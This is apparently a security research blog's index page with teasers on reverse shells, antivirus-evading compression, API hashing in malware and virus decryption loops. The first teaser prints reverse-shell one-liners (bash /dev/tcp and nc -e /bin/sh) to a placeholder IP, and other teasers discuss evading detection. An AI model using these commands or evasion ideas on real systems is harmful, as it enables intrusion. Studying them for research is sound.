Friday, April 4, 2025

Interactive shells and port-knocking

One of the first steps when the system is already compromised is to access the shell on the target. Hackers typically use the same one-liners to connect to the system:

bash -i >& /dev/tcp/1.2.3.4/8080 0>&1 # or
nc -e /bin/sh 1.2.3.4 8080

A dumb shell has many drawbacks – lost sessions continue to appear in the process list, you can’t edit a mistakenly typed command, if it's unset HISTFILE, all the hacker activities will remain in the history, and later on, it will have to be cleaned, from the same basic shell, without the ability to launch a proper text editor. Classic tricks, such as turning the shell into an interactive one, help to some extent:

python -c 'import pty; pty.spawn("/bin/bash")'

Or using utilities like socat. A cool method was suggested by Phineas Fisher – to spawn a shell via netcat, move it to the background (Ctrl-Z), switch the terminal to raw mode with stty raw -echo, and then return to the shell with fg. However, there’s still a risk of making mistakes. Why not write a full-fledged shell of your own? What happens when we call pty.spawn() and stty?

Read more »
2 comments

Wednesday, April 2, 2025

Compression, entropy and polymorphism

The Modexp blog has a great collection of compression algorithms from 8-bit computers, demos, and viruses. I noticed that most of them are variations on the Lempel-Ziv theme. This raised a few questions for me: Is it possible to make compression "polymorphic" so that it would be impossible to create a signature for the compressed data itself? And another question: Can the same algorithms be used for the opposite task — entropy normalization? (Compressed text has high entropy, and antivirus software often uses entropy as an indicator that the file is compressed and requires deeper analysis).

Read more »
2 comments

Sunday, March 30, 2025

Random hashes and bloom filters

To do something useful, a virus or a beacon needs system functions. The obvious way is to simply compile a list of the necessary functions, thus simplifying the work for antivirus and reverse engineers. To prevent strings from being visible in the code, the string itself can be replaced with a hash. It seems that the first person to come up with this technique was StarZero from IKX group. In his virus Voodoo (autumn 1998), he used CRC32 to search for the necessary APIs. Despite the fact that over twenty-five years have passed, it is still used in products such as Cobalt Strike and Metasploit.

But why CRC32? In 2004, Z0mbie suggested generating hash functions randomly, using the template H = ROL(H, x) + C. Since the list of all function names is known, one can check the hash function for collisions. And such a hash (ROR 13/ADD) is used in Cobalt Strike. Moreover, if the constant in the ROR instruction is changed, the number of detections is significantly reduced.

Read more »
0 comments

Revisiting pseudo-random index decryption

This article was published in tmp.out #4

Almost twenty-five years ago, Mental Driller discovered an interesting technique that allows constructing a decryption cycle in such a way that each element is accessed in a random order [1]. The algorithm looks quite simple, but even after it caught the attention of well-known AV researchers [2], they could not explain why the algorithm works correctly. In the conclusion of his article, Frederic Perriot wrote:

I suspect the bijectivity of the family of endomorphisms studied here is a general property of some families of functions over well-known groups or fields. If you have a mathematical background and would like to share arithmetic insights on this problem, I'd be grateful if you can send me the explanation...

Read more »
0 comments
Subscribe to: Posts (Atom)